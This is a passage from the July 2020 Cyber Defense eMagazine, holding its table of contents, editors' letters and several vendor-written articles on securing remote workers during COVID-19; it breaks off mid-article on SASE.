Cyber Defense eMagazine July 2020 Edition

Security, Convenience & Privacy: A 

Neverending War 

Is the New Normal Workspace Secure? 

3 Practices to Avoid Security Risk in A Work 

from Home World 

7 Security Precautions to Protect Remote 

Workers 

…and much more… 

Cyber Defense eMagazine –July 2020 Edition 1 

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.

CONTENTS 

Welcome to CDM’s July 2020 Issue ------------------------------------------------------------------------------------------------- 7 

Security, Convenience & Privacy: A Neverending War------------------------------------------------------------- 24 

By Michael Covington, VP of Product Strategy, Wandera 

Is the New Normal Workspace Secure? ------------------------------------------------------------------------------- 26 

By Simon Townsend, CMO, IGEL 

3 Practices to Avoid Security Risk in A Work from Home World ------------------------------------------------ 29 

By Akshay Bhargava, Chief Product Officer, Malwarebytes 

7 Security Precautions to Protect Remote Workers ---------------------------------------------------------------- 32 

By Marty Puranik, President & CEO, Atlantic.Net 

The Race to Pivot Around Remote Work and The Emergence Of SASE ---------------------------------------- 36 

By Amit Bareket, CEO and Co-Founder of Perimeter 81 

Organizations: It’s Time to Rethink How You Protect Environments from Within-------------------------- 39 

By Richard Melick, senior technical product manager, Automox 

Don’t Be Breached When Using Commercial Software Products ----------------------------------------------- 42 

By Randy Reiter CEO of Don’t Be Breached 

Is Proactive Insider Risk Mitigation Possible? ------------------------------------------------------------------------ 44 

By David A. Sanders, Director of Insider Threat Operations, Haystax 

Benefits of A Security Operation Center (SOC) ----------------------------------------------------------------------- 50 

By Pedro Tavares, Editor-in-Chief seguranca-informatica.pt 

In 2020, SOCs Are Understaffed Yet Overconfident in Ability to Detect Cyberthreats --------------------- 53 

By Steve Moore, chief security strategist, and Samantha Humphries, senior product marketing manager, 

Exabeam 

Software-Defined Perimeters Offer Secure Connectivity to Smart Cities ------------------------------------- 60 

By Don Boxley, CEO and Co-Founder, DH2i (www.dh2i.com) 

Managing Small Business Cybersecurity During Covid-19 -------------------------------------------------------- 63 

By Bill DeLisi, CEO of GOFBA 



IOT Security Embedded in Memory Cards ----------------------------------------------------------------------------- 66 

By Hubertus Grobbel, Vice President Security Solutions, Swissbit. 

How To Fight A Virus: Lessons From Cybersecurity ----------------------------------------------------------------- 70 

By Yotam Gutman, SentinelOne 

How to Combat Cybersecurity Attacks & Cyber Warfare --------------------------------------------------------- 74 

By Adnan Olia, Chief Operating Officer and Co-owner of Intradyn 

COVID-19 And the Easyjet Hack - A Perfect Phishing Storm ------------------------------------------------------ 78 

By Shachar Daniel, Safe-T’s CEO 

Should We Be Worried About Vehicle Hacking? -------------------------------------------------------------------- 81 

By Martin Banks 

Cyber Attacks at Sea: Blinding Warships. ----------------------------------------------------------------------------- 85 

By Julien Chesaux, Cyber Security Consultant, Kudelski Security 

Iphone Extraction Without A Jailbreak -------------------------------------------------------------------------------- 92 

By Oleg Afonin, Security Researcher, ElcomSoft Co.Ltd. 

How to Maintain Anonymity in Communications? ----------------------------------------------------------------- 96 

By Milica D. Djekic 

Everything You Want to Know About Single Sign-On ------------------------------------------------------------ 100 

By Ayman Totounji, Founder , Cynexlink 

A Passwordless Future: Will Biometric Identification Replace Passwords? -------------------------------- 106 

By Joshua Frisby, Founder of PasswordManagers.co 

Post COVID-19: Cloud, Remote Work and BYOD Security Predictions --------------------------------------- 111 

By Anurag Kahol, CTO and co-founder, Bitglass 

The Rise of COVID-19 Phishing Attacks: How Cyber Adversaries Are Adopting Phishing to Generate 

New Threat Vectors ------------------------------------------------------------------------------------------------------- 113 

By Brad Slavin, CEO of DuoCircle LLC 

Post COVID-19: Password Extinction Accelerated; Telemedicine Spurs Fraud ----------------------------- 117 

By Robert Prigge, CEO of Jumio 



The Future Of Security – Predictions Post COVID-19 ------------------------------------------------------------- 119 

By Mike Riemer, Pulse Secure, Global Chief Security Architect 

Post COVID-19 Cybersecurity and Future-of-Work Predictions ------------------------------------------------ 121 

By DivvyCloud by Rapid7, Chris DeRamus, VP of Technology, Cloud Security Practice 

Building A Telework Health Scorecard To Meet Surge Requirements And Long-Term Resiliency ---- 124 

By Stan Lowe, Global Chief Information Security Officer, Zscaler 

CERT Warns Bad Actors Are Targeting Remote Access – How Security Operations Find And Route 

These “Below The Radar” Attacks ------------------------------------------------------------------------------------ 128 

By Saryu Nayyar, CEO, Gurucul 

CRYPTO ---------------------------------------------------------------------------------------------------------------------- 130 

By Staford Titus S 



@MILIEFSKY 

From the 

Publisher… 

New CyberDefenseMagazine.com website, plus updates at CyberDefenseTV.com & CyberDefenseRadio.com 

Dear Friends, 

Since last month, we’ve seen a continuation and deepening of the effects of COVID-19 on 

nearly all enterprises which depend on cyberspace for their operations. Both the articles in 

this month’s magazine and our daily publications, as well as news from nearly all channels, 

reflect the challenges of maintaining security in an ever-growing dependence on cyberrelated 

systems of all kinds. 

At the same time as the “normal” operations of enterprises across the board deal with these 

issues on a daily basis, one major periodic phenomenon is coming into sharp focus. The 

election cycle in the United States is upon us, with a mere 4 months until the presidential election. 

There is little doubt that electronic activities will have a significant effect on the outcome of the election. Already 

forces from both legitimate and illicit entities are manifesting their influence. From social media to traditional 

news and commentary outlets, both attackers and defenders appear to be gearing up. 

The apparent result of reopening of various States and municipalities has been described as a resurgence of the 

first wave of COVID-19 as well as an incipient second wave. Whichever it is, the effects upon widespread 

operations in the marketplace and the more focused impact on the electoral campaigns are undeniable. We will 

continue to watch closely and report further developments. 

We are pleased to continue providing the powerful combination of monthly eMagazines, daily updates and 

features on the Cyber Defense Magazine home page, and webinars featuring national and international experts 

on topics of immediate interest. 

Warmest regards, 

Gary S. Miliefsky 

Gary S.Miliefsky, CISSP®, fmDHS 

CEO, Cyber Defense Media Group 

Publisher, Cyber Defense Magazine 

P.S. When you share a story or an article or information about CDM, please use #CDM and 

@CyberDefenseMag and @Miliefsky – it helps spread the word about our free resources even more 

quickly 



@CYBERDEFENSEMAG 

CYBER DEFENSE eMAGAZINE 

Published monthly by the team at Cyber Defense Media Group and 

distributed electronically via opt-in Email, HTML, PDF and Online 

Flipbook formats. 

InfoSec Knowledge is Power. We will 

always strive to provide the latest, most 

up to date FREE InfoSec information. 

From the International 

Editor-in-Chief… 

The international effects of recent medical and political 

developments continue to show up prominently in the world of 

cybersecurity. We see a continuation of trends in Coronavirus 

effects, cyber-criminal activity, and government actions in response 

to these threats. 

International effects of COVID-19 include restrictions on physical 

travel, resulting in greater dependence on cyber “travel” to 

accomplish necessary business and government functions. As 

might be expected, the expanded reliance on cyber assets also 

provide greater opportunities for criminal activity. 

We may also note the divergence in approaches between the 

European model, using an integrated set of laws and regulations, 

on one hand, and the U.S. model, which tends to respond to these 

challenges on a State-by-State basis, on the other. I hasten to add 

there are some indications of movement on the federal level to 

adopt national privacy laws which would provide a greater measure 

of conformity. 

As I observed last month, failure to work together in a cooperative 

fashion can only provide more opportunities for the abuse and 

misuse of sensitive information, even leading to the compromise of 

the command and control systems of our critical infrastructure. 

Accordingly, may I suggest that in the days ahead we agree to put 

our differences aside in favor of responding to our common 

enemies: the COVID-19 virus itself and those who would take 

advantage of this crisis to perpetrate criminal schemes. 

To our faithful readers, we thank you, 

Pierluigi Paganini 

International Editor-in-Chief 

PRESIDENT & CO-FOUNDER 

Stevin Miliefsky 

stevinv@cyberdefensemagazine.com 

INTERNATIONAL EDITOR-IN-CHIEF & CO-FOUNDER 

Pierluigi Paganini, CEH 

Pierluigi.paganini@cyberdefensemagazine.com 

US EDITOR-IN-CHIEF 

Yan Ross, JD 

Yan.Ross@cyberdefensemediagroup.com 

ADVERTISING 

Marketing Team 

marketing@cyberdefensemagazine.com 

CONTACT US: 

Cyber Defense Magazine 

Toll Free: 1-833-844-9468 

International: +1-603-280-4451 

SKYPE: cyber.defense 

http://www.cyberdefensemagazine.com 

Copyright © 2020, Cyber Defense Magazine, a division of 

CYBER DEFENSE MEDIA GROUP (a Steven G. Samuels LLC d/b/a) 

276 Fifth Avenue, Suite 704, New York, NY 10001 

EIN: 454-18-8465, DUNS# 078358935. 

All rights reserved worldwide. 

PUBLISHER 

Gary S. Miliefsky, CISSP® 

Learn more about our founder & publisher at: 

http://www.cyberdefensemagazine.com/about-our-founder/ 

8 YEARS OF EXCELLENCE! 

Providing free information, best practices, tips and 

techniques on cybersecurity since 2012, Cyber Defense 

magazine is your go-to-source for Information Security. 

We’re a proud division of Cyber Defense Media Group: 

CYBERDEFENSEMEDIAGROUP.COM 

MAGAZINE TV RADIO AWARDS 



Welcome to CDM’s July 2020 Issue 

From the U.S. Editor-in-Chief 

Once again, the July issue of Cyber Defense Magazine brings readers over two dozen articles on cyber 

and security topics of immediate interest. We are fortunate to rely on a broad spectrum of contributors 

who share their expertise and insights with our community. 

We tend to look for trends and upcoming challenges and responses. For both individual consumers and 

corporate participants, the establishment of a “value proposition” is the cogent answer to the question 

“What problem does it solve?” 

This month, readers will see elaboration of issues beyond the standard “cybersecurity” problems to solve. 

For instance, the impact of the broad collection of sensitive personal data in controlling the spread of 

COVID-19 potentially calls for strong protections of individual privacy. At some point, a balance must be 

reached between the privacy needs of the individual and the “greater good,” a rhetorical construct which 

can often lead to unintended adverse consequences. 

The migration of workers to a permanent home-based operation appears to require more permanent 

cybersecurity solutions than just a temporary setup with expectations for workers to return to the more 

secure environment of HQ. 

The age-old saying that “the only constant is change” holds true in these times, as demonstrated by the 

breadth and depth of the articles we are pleased to bring you this month. 

Wishing you all success in your cyber security endeavors, 

Yan Ross 

US Editor-in-Chief 


About the US Editor-in-Chief 

Yan Ross, J.D., is a Cybersecurity Journalist & US Editor-in-Chief for 

Cyber Defense Magazine. He is an accredited author and educator and 

has provided editorial services for award-winning best-selling books on 

a variety of topics. He also serves as ICFE's Director of Special Projects, 

and the author of the Certified Identity Theft Risk Management Specialist 

® XV CITRMS® course. As an accredited educator for over 20 years, Yan addresses risk management 

in the areas of identity theft, privacy, and cyber security for consumers and organizations holding sensitive 

personal information. You can reach him via his e-mail address at 

yan.ross@cyberdefensemediagroup.com 





















Your website could be vulnerable to outside attacks. Wouldn’t you like to know where those 

vulnerabilities lie? Sign up today for your free trial of WhiteHat Sentinel Dynamic and gain a deep 

understanding of your web application vulnerabilities, how to prioritize them, and what to do about 

them. With this trial you will get: 

An evaluation of the security of one of your organization’s websites 

Application security guidance from security engineers in WhiteHat’s Threat Research Center 

Full access to Sentinel’s web-based interface, offering the ability to review and generate reports as well 

as share findings with internal developers and security management 

A customized review and complimentary final executive and technical report 

Click here to sign up at this URL: https://www.whitehatsec.com/info/security-check/ 

PLEASE NOTE: Trial participation is subject to qualification. 















Security, Convenience & Privacy: A Neverending War 

By Michael Covington, VP of Product Strategy, Wandera 

The veritable “Sophie’s Choice” among security decision-makers has increasingly become the three-way 

tug-of-war between security, convenience and privacy. With the introduction of General Data Protection 

Regulation (GDPR) and California Consumer Privacy Act (CCPA) in 2018, there’s a clear global trend 

toward prioritizing consumer privacy. However, the COVID-19 pandemic has spurred unprecedented 

numbers of remote employees, leaving organizations grappling with a novel set of challenges when it 

comes to security. Yet according to Verizon’s Mobile Security Index 2020 (MSI), organizations continue 

to sacrifice security, with 52 percent of respondents citing convenience as a top reason to let security 

take a backseat. 

When GDPR took full effect in 2018, it was tangible evidence that people were ready to take more control 

over their personal data. The terms of GDPR require organizations to ensure that the personal information 

that is gathered during normal business transactions remains protected while still respecting the privacy 

rights of data owners, demonstrating a heightened sense of concern over personal data privacy. The 

passing of the California Consumer Privacy Act (CCPA) in the same year was further confirmation that 

consumers were concerned about where and how their personal data was being used, and legislators 

affirmed they were within their rights to know. 

So, the pressure for organizations to remain transparent while simultaneously protecting the security of 

their employees and users has been steadily building, leaving business and security leaders at a 

crossroads. So the question remains: how are organizations to choose between security, convenience, 

and privacy when it comes to their employees and customers alike? 



Industry giants have chosen to approach this ongoing dilemma in different ways. Particularly as it 

pertains to mobile security, Microsoft has tackled this challenge with the implementation of Mobile 

Application Management without enrollment (MAM-WE). As work environments become increasingly 

remote, organizations face an entirely new security landscape that will require them to adapt to BYOD 

scenarios. MAM-WE gives organizations the ability to manage individual apps to protect sensitive 

employee data, even from a personal device, in a setting outside the office. Microsoft’s offering is just an 

example of ways that companies have broached the issue of security, without sacrificing convenience 

and privacy. 

There was roughly 24 percent of the full-time U.S. workforce working remotely for at least a portion of 

their workweek in pre-pandemic days, but that number is steadily rising as a result of COVID-19. It’s now 

critical that security decision-makers not overlook the importance of mobile and cloud security in this 

evolving landscape. Our own analysis shows that as of March 30, the number of connections to 

collaboration tools like Zoom and Microsoft Teams has increased by 109% since the first week of 

February. 

As Verizon’s Bryan Sartin put it, “The types of devices, diverse applications and further emergence of 

IoT devices further complicate security. Everyone has to be deliberate and diligent about mobile security 

to protect themselves and their customers.” Reiterating the sentiment that leaders will have to recognize 

the inherent risks of increasingly mobile and cloud-connected environments and take proactive action. 

There is a way to strike a balance between providing a convenient user experience that also maintains 

the security and privacy of users. One recommendation would be for organizations to put policies in place 

that utilize offerings like Wandera Private Access or MAM-WE to ensure that the security of corporate 

data is not compromised, even when employees use a personal device. Outlining and adopting formal 

acceptable use policies within organizations will also be a step toward finding this balance. 

The findings from recent mobile threat research indicate a trend that decision-makers still believe they 

have to make a choice between security, convenience, and privacy for their organizations. But with more 

privacy-preserving and user-friendly security solutions becoming available, a harmonizing middle ground 

can be found. It’s time to leave the notion that organizations can’t have both in the past, and focus on 

solutions that allow for the security, convenience and privacy trifecta moving forward. 

About the Author 

Michael J. Covington, Ph.D., is a seasoned technologist and the Vice 

President of Product Strategy for Wandera, a leading provider of mobile 

security. Michael is a hands-on innovator with broad experience across the 

entire product life cycle, from planning and R&D to executing on company 

strategies. He previously held leadership roles at Intel Labs, Cisco Security, 

and Juniper Networks. With a diverse background as a published computer 

science researcher and as an IT professional, Michael has experienced 

technology from all sides and enjoys bringing innovations to the market, 

specifically in the areas of mobility and connectivity. He can be reached at 

@MJCovington and at https://www.wandera.com/ 



Is the New Normal Workspace Secure? 

Remote working has accelerated the need to better secure endpoints everywhere 

By Simon Townsend, CMO, IGEL 

Just a few years ago we were predicting Desktop-as-a-Service (DaaS) would soon have its day as 

enterprises were looking for a way to keep up with the BYOD, multi-device, and user mobility movements. 

It was time to rethink the ‘desktop’ from a fixed-location to a fluid endpoint that could be anywhere – one 

which could exist as any device, and increasingly delivered virtually. Fast-forward to today and the 

COVID-19 crisis, and the need to adopt a more modern approach to managing and securing the endpoint 

has become painfully clear. 

Enterprises have had to pivot overnight to a workforce sheltering in place with people working remotely 

on a variety of devices that may or may not have been up to date on security protocols. With evidence 

mounting that companies like Twitter are blessing working remote as a regular option going forward, 

there are a few conclusions: 1) the workspace has to be digital since people are using multiple devices, 

on site or remotely, 2) endpoint security needs to embrace this new work model and close all security 

gaps, 3) DaaS and the cloud will become even more important to deliver consistent, secure user 

experiences, and 4) Virtual Desktop Infrastructure (VDI) continues to be an optimum strategy for 

maintaining system integrity from endpoints to the data center or cloud. 

VDI and DaaS Up to the Task 

New pressures on IT teams in response to the evolving COVID-19 recovery are not going to come with 

bigger budgets or more staff. The increased need to improve security and ensure any asset used 



emotely is governed correctly via user profiles, associated policies, and access control, all while 

supporting productivity, is added to the day-to-day IT process challenges businesses face. In a recent 

survey of IT professionals Enterprise Strategy Group (ESG) found, after software licensing, inventory and 

compliance, the main challenges in delivering a full-featured desktop centered on the pace of change 

(30%), troubleshooting issues (29%) and operational costs (29%). 

VDI and DaaS offer solutions to these IT challenges, with the benefit of maintaining a high level of security 

without impacting user productivity. As ESG notes, businesses have implemented virtual desktop 

infrastructure (VDI) and desktop-as-a-service (DaaS) to enable remote employees, but only a small 

percentage of an employee base made use of this technology. Prior to COVID-19 neither technology 

had reached high deployment, percentage wise, within organizations. The ESG survey found 40% of 

respondents indicated that their organization currently uses VDI technology but 25% are on the verge of 

doing so. Similarly, ESG found 39% of respondents reported DaaS usage but planned an increase. Post 

COVID, ESG’s expectation is these deployments will rise to accommodate the changing work 

environment. 

Answering the Rise of Security Questions 

The new business landscape has sharpened the focus to the digital workspace, to make sure the basics 

of data security and risk mitigation are handled at the level needed to ensure business continuity. A more 

remote workforce has shown how essential endpoint management and security is to business survival. 

Businesses are looking at: 

1. Balancing the need for access policy controls with employees’ desire to use more BYOD devices 

remotely. The ESG survey found a significant disconnect: while 79% of organizations believe VDI 

and DaaS are more secure than traditional desktop provisioning, 65% of the respondents will 

have restrictions on the devices used to access VDI or DaaS workspaces. These businesses are 

not ready to adopt a policy in which employees are allowed to use personal devices. While they 

perceive VDI or DaaS as superior options, they draw the line at employee-owned devices. 

2. Embracing a digital workspace solution like Citrix Workspace to further enable secure remote 

access. Remote application and desktop delivery and access to web- and cloud-based DaaS 

apps via a secure browser, paired with secure endpoint management software will enable 

employees to access their user profile regardless of location. Whether using the cloud or DaaS, 

workloads and sensitive data are protected. 

3. Maintaining a high level of security without impacting user productivity. The ESG survey found 

improving employee collaboration to be a top priority in delivering desktop environments, followed 

closely by detecting security incidences, vulnerabilities, and risk, and managing user expectations 

of access, devices choice, and applications preferences. An effective solution is a next-gen, 

secure Linux OS on endpoints that can be auto-configured based on predefined profiles for simple 

user access. Device agnostic, this type of advanced endpoint software can enable organizations 

to secure all those remote BYOD devices without fear of security risk. 



Making the New Normal Environment Safe 

IT teams are certainly faced with an unprecedented list of challenges this year. However, the tools to 

secure the new hybrid environment of more people working remotely fortunately do exist. VDI providers 

like Citrix are proven options for secure, device agnostic desktop delivery. DaaS gives organizations 

another route to deliver applications via the cloud, on demand and securely, enabling business continuity 

in the case of a disruptive event. Advanced endpoint management software is already in successful 

deployment, enabling workers to access their user profiles via the cloud, while IT policy controls are 

executed to support network security. 

Regardless of the system chosen, VDI or DaaS, the task is clear: organizations will need to embrace the 

use of more personal and BYOD devices, coupled with advanced security software to manage the 

changing work culture. 


Simon Townsend is global chief marketing officer for IGEL, provider of the 

next-gen edge OS for cloud workspaces. 



3 Practices to Avoid Security Risk in A Work from Home 

World 

By Akshay Bhargava, Chief Product Officer, Malwarebytes 

Well before COVID-19 hastened people working from home, users embraced “bring your own device” 

(BYOD) practices. It created a proliferation of work-connected personal mobile devices that have become 

a regular part of our workplace fabric. But today, as the workplace has shifted to our homes, employees 

are now practicing a “use your own device” (UYOD) approach which means even more personal devices 

are connecting to company networks. 

Like BYOD, UYOD, enables employees to be connected to work when they want, and over any device 

they have on hand – empowering them with the flexibility and access they need to work, at home. But 

one concern still prevails: how to ensure proper security protocols are set and stringently followed in 

order to provide the same level of security that corporate-owned devices bring. 

The COVID-19 phenomenon brings personal endpoint device security concerns, once again, to the 

forefront. Undoubtedly these personal devices come with a wide range of risk: while some diligent 

employees may fastidiously follow security protocols, others that don’t take cybersecurity threats as 

seriously will inadvertently expose their devices to bad actors. This uneven security posture comes at a 

time when research shows the volume of global threats against business endpoints has increased by 13 

percent year-over-year. From an increase in enterprise-focused threats to the diversification of 

sophisticated hacking and stealth techniques, cybercrime is clearly targeting organizations with 

increasing vengeance. And working from home on personal devices further elevates this risk. 



Improving UYOD Security 

While all organizations face increasing risk at the endpoint, small-to-medium sized businesses (SMBs) 

are particularly vulnerable to a cyberattack. How could they not be when they are operating on thinner 

margins, with limited IT staff and less financial reserves than enterprises? To minimize security risk, 

SMBs need to put these practices in place when personal devices are being used to access business 

data: 

Embrace a Cultural Security Mindset. One of the obstacles to getting personal device security 

under control is the mindset that someone else, usually IT, ‘owns’ the cybersecurity and data 

protection problem. Even though 70 percent of data breaches are known to start at the endpoint, 

this data point isn’t translating into the average employee or contractor’s consciousness. 

No matter how strong defenses are, users can introduce threats to a company’s networks by: 

• Falling for phishing scams 

• Posting secure information on social media 

• Inadvertently giving away credentials 

Employees will more enthusiastically embrace BYOD/UYOD security protocols if management 

has effectively communicated not only the how behind day-to-day practices to prevent malware 

or other attacks, but also why mitigating risks is so critical. Acceptable use guidelines might 

include: 

• How to detect social engineering tactics and other scams 

• What constitutes acceptable Internet usage 

• How remote workers should securely access the office network 

• How to properly use password management systems 

• How to report security incidents according to their urgency 

To encourage employees to adopt ownership of their own device security, it’s important to note 

smaller enterprises thrive on being more nimble. This ‘get it done now’ mentality can lead to 

applications being put into play before being thoroughly vetted for access controls and may cause 

a rise in “shadow IT” which may not meet organizational security standards. It can also lead to 

‘rogue’ assets, or personal devices being deployed without full vetting for risks. 

The recent wholesale shift to remote working has highlighted this risk more than ever as personal 

device use explodes. When communicating with employees, there needs to be a careful balance 

between asking them to be more mindful of security and realizing their first goal is always to get 

their work done. Communication and education here are essential to individual participation in 

helping mitigate risk at the endpoint. 

Optimize Limited Resources. With limited IT staff, and often no dedicated security staff, SMBs will 

be looking to guard against the increased security risks from COVID-19 by executing strategic 

security initiatives for newly remote workers and supporting long-term viability. One critical need 

in threat defense is endpoint detection and response (EDR) software. EDR is vital to containing 

a costly breach that could financially devastate an SMB or enterprise. EDR can help software 

security teams contain, investigate and respond to threats that may have bypassed other 

defenses like antivirus tools. An effective EDR solution can provide automated analysis of data to 

identify suspicious activity, enabling IT to make a timely decision on the threat level and take quick 

action accordingly. 



Simplifying personal endpoint device protection is also imperative. Managing protection for many 

devices, given scarce resources, demands centralized management from a single pane of glass 

to provide real time protection and on-demand remediation. Many SMBs may also consider 

outsourcing their security needs to a managed service provider (MSP) in order to free up 

resources, but this should not take the place of employee security training. 

Apply Privacy Protection. As users work from home, they need an extra layer of protection to stop 

cyberattack risk – as they are no longer behind the security of your corporate network. This is 

where the value of a virtual private network (VPN) comes into play. This important, and often 

overlooked, layer of defense ensures that a users’ IP address is private, secure, and encrypted, 

helping to protect your business data. 

Serving as a digital middleman between the user and the Internet, a VPN can deter hacking and 

unauthorized tracking which will help prevent employees from being cyberthreat targets. It works 

like an encrypted tunnel between the user and your data, keeping away the prying eyes of threat 

actors looking to access your business data – including passwords, personally identifiable 

information (PII), customer information, credit card numbers and more. By employing a VPN, you 

can limit the risk of employees working from their personal networks while protecting critical 

business and customer information. 

Post-COVID Environment 

Eventually employees will begin returning to work onsite, but this crisis has demonstrated the benefits of 

working at home. This means that the heightened use of personal devices for business is here to stay. 

SMBs can manage this new working reality by improving employee communication on threat prevention, 

creating a strategy to more thoroughly record and protect assets, and implementing the protection of a 

VPN to keep important business data away from prying eyes. 

In the longer term, all these security measures are going to be critical to economic viability. 

Cybercriminals have been exploiting COVID-19, but they will revert back to other forms of cybercrime soon 

enough and ransomware attacks, costly data breaches and business disruption will be back in the news. 

SMBs can avoid tragedy by implementing strong preventative anti-attack measures now. 


Akshay Bhargava is the Chief Product Officer at Malwarebytes, a leading 

provider of advanced endpoint protection and remediation solutions. 



7 Security Precautions to Protect Remote Workers 

By Marty Puranik, President & CEO, Atlantic.Net 

The COVID-19 pandemic has engulfed the world's population, crippled global economies, and changed 

the way of life for almost every single person in every single country around the world. Nearly six million 

infection cases have been confirmed. Over two million people have recovered, but over 350,000 deaths 

have been registered so far, and sadly this figure is expected to grow substantially in the coming days 

and weeks. 

Governments around the world have encouraged employees to work from home wherever possible. 

Frontline key workers are still required to continue their occupations but unfortunately, many millions 

have lost their jobs, and tens of millions have been furloughed on government financial aid. 

Currently, there is an enormous workforce engaged and actively working from home, keeping businesses 

alive in one of the biggest challenges to face a generation. Some reporters are referring to this shift in 

working behavior as the greatest work-from-home experiment. 

With this paradigm shift of working behavior, additional risks and security concerns must be considered 

to protect organizations from things like wire transfer fraud, ransomware, and exploitation. There is a vast 

amount of evidence to suggest that cybercriminals are out in force to take advantage of the COVID-19 

pandemic. 

The most common attack vectors seen in recent weeks are targeted and extensive phishing email 

campaigns and spoofing using SMS and mobile communications platforms such as WhatsApp. 



What can you do to protect your workforce and business from being compromised? We have compiled 

a list of some of the most effective measures to be undertaken to protect your organization. 

Make Sure Your Security Policy Is Valid 

The COVID-19 outbreak has highlighted that most organizations’ cybersecurity policies, especially 

policies regarding mobile computing and teleworking, may be inadequate. Businesses have been 

scrambling to change the guidelines to adapt to the pandemic. Very few organizations would have had a 

business continuity strategy that solved all the issues brought about by the seismic shift to home working. 

Specific policies to update may revolve around the physical protection of company IT equipment, making 

sure children or relatives do not use company assets, which can help to keep assets in good working 

condition. If additional technology is needed by the employee, such as extra monitors, keyboards, or 

printers, a formal process should exist to track where company assets are located. Perhaps logging a 

service desk ticket for management teams to approve the removal of company technology. This process 

greatly improves how assets can be tracked. 

Other control measures can be introduced or updated to define the organization's rules and regulations 

on the usage of laptops, computers, handheld tablets, mobile phones, and digital media, including disks 

and memory sticks. 

Keep Data Protection Relevant 

Maintaining data protection is critically important for organizations, even more so when employees are 

working from home. Organizations are duty-bound by government regulations to uphold data protection. 

The regulations still apply no matter where the employees are working, be that an office-based role, or 

when working from home. 

All laptops should have some form of data encryption software installed, such as Microsoft BitLocker. 

This software protects the data stored on the employee’s physical device. In the event a company device 

is lost or stolen, the data is secured and encrypted. Domain policies can force remote terminals to lock 

the screen after a few minutes of inactivity during the lockdown period. 

All portable equipment should have a machine or boot-up password, and a domain user account that 

should be required when powered up. This may be a BIOS protected screen lock, or it might just be the 

Windows Logon utility. Either way, the device must not boot straight into the operating system without 

prompting for credentials. This will stop unauthorized access to the data stored on the equipment. 

Secure Physical Assets 

High valued assets must already have the standard security features such as usernames, passwords, 

and PINs. Extreme care should be taken with mobile computing being used outside of the organization’s 



premises. In the home environment, extra care should be taken to secure customer and organizational 

data. 

Protection should be in place to avoid unauthorized access or disclosure of the information stored and 

processed by the equipment. No other person should be able to access the equipment or view information 

on the screen, and you should guard against eavesdropping. Do not openly discuss confidential or 

Payment Card Information where you may be overheard. 

Create Strong Passwords 

Ensuring a strong and robust password protection policy might sound like common sense, however, the 

weakest point of security on a corporate network is the end-user. Enforcing system-wide, managed 

password policies can help to create a hardened perimeter on the network. 

Support teams may have to do a little extra work to unlock and reset user accounts if the password is 

forgotten, but instilling a complex password policy, and a regular, enforced password expiration date will 

help to give the best protection to the remote workforce. 

Introducing multi-factor authentication (MFA) for home workers can add extra security for business 

assets. Using MFA to access cloud storage such as Onedrive, or when accessing Exchange email 

systems and collaboration tools such as Slack, Teams, or Skype for Business, will add an extra layer of 

security when out of the office. 

Communication and the Training of Homeworkers 

Lots of people have worked from home in the past, but for many, COVID-19 has forced employees to 

use technology and work from home for the first time. For many, this change is extremely difficult to adapt 

to. Not only at a technical level, but adapting to online meetings and working on your own. 

This introduces many security risks. Employees may not remember all the rules of home working. They 

may bring their device or they may unintentionally share confidential information on social media. 

Clear and concise communication channels from senior management or HR should communicate a 

consistent message defining what the expectations of the employee are. The messaging should describe 

how the business intends to function during a lockdown and what the company priorities are. 

Combine that with training sessions, online classes, or one-on-one training about how to use 

collaboration tools, cloud productivity tools, and how working from home affects access to everyday user 

applications. 

Engaging with employees regularly is a great way to promote wellbeing at work, and keep productivity 

and engagement throughout the business. This benefits morale, and importantly creates a greater 

understanding of how to use computer systems securely. 



System Updates / Antivirus 

Security updates to operating systems and applications have never been more important than during the 

COVID-19 crisis. System administrators have the responsibility of ensuring that the mobile workforce 

information technology is up to date and has the latest security updates. 

When an employee's laptop connects to a corporate network, it will typically check in with a centralized 

administration portal, such as Microsoft System Center (SCCM). Toolsets like this manage the update 

schedule of thousands of laptops, computers, and mobile devices over a VPN or standard Internet 

connection. 

Administrators can force updates out on demand to keep antivirus, antimalware, and system updates at 

the latest level. This creates the best line of defense against malware and ransomware attacks. 

Software Protections 

The software on the portable equipment must comply with the organizational standards to ensure it is 

supportable. As mentioned earlier, up-to-date antivirus detection software is installed to protect local 

systems. No unauthorized software should be loaded on to company assets, no matter how trivial. 

Software should not be tampered with to circumvent security measures put in place, such as disabling 

antivirus system scans. 

Any tampering of the software should be considered a disciplinary offense, and the antivirus suite should 

be configured to audit user behavior. When used to access the Internet, the user’s device should utilize 

a proxy server where the activity is logged and monitored. 


Marty Puranik co-founded Atlantic.Net from his dorm room at the 

University of Florida in 1994. As CEO and President of Atlantic.Net, 

one of the first Internet Service Providers in America, Marty grew the 

company from a small ISP to a large regional player in the region, while 

observing America's regulatory environment limit competition and 

increase prices on consumers. To keep pace with a changing industry, over the years he has led 

Atlantic.Net through the acquisition of 16 Internet companies, tripling the company's revenues and 

establishing customer relationships in more than 100 countries. Providing cutting-edge cloud hosting 

before the mainstream did, Atlantic.Net has expanded to seven data centers in three countries. 



The Race to Pivot Around Remote Work and The 

Emergence Of SASE 

By Amit Bareket, CEO and Co-Founder of Perimeter 81 

When Kodak completely neglected the rise of digital photography (an idea that Kodak itself invented) and 

then continued to willfully drive for a revival of technology destined for the dustbin, it became the 

boilerplate example of what can happen when an organization fails to embrace change, and chooses to 

fight against the current rather than go with the flow. 

Trends and new sources for demand force companies to refresh their business models and pivot around 

new concepts, or slowly perish. This is happening now in security, where providers still get away with 

offering singular and traditional solutions like firewalls, antivirus software, and VPNs - but not for long. 

These products do help to ward off a number of the most common attacks, but converging trends have 

whipped up industry waves almost reminiscent of those that once toppled the giant of film. 

Crowding the Cloud 

The adoption of cloud technology among companies has been full steam ahead for the last decade or 

more, and as it becomes our new normal, the security industry must react with new ways to protect data 

that’s anywhere and everywhere. For a business, ascension to the cloud has been deliberately slow, a 

department here, a business flow there, so the tide of this sea change has been gradual. 

At least, it was until recently. No one wants to harp on the lessons taught by COVID-19, but here we are. 

Suddenly, organizations with a desire to exist into the next fiscal year find themselves scrambling to grant 



access to remote employees, and this has meant the rapid adoption of cloud technologies and 

subsequent creation of a host of new issues that security providers must now respond to. 

Overloaded networks on traditional architecture experience high latency, and each new employee 

connecting to the resources they need to work slows down the connection speed of his or her peers. 

Performance is small potatoes, though. IT teams are more overwhelmed with the number and variety of 

different devices and unfamiliar sources of traffic, and security leaders are racing to provide a better 

solution than what was available just last year. 

IT Still Catching Up Cloud-Wise 

Many cloud services tied into local environments and available to many remote workers (often from 

personal Wi-Fi connections with dubious security) create gaps where exposure occurs, even due to small 

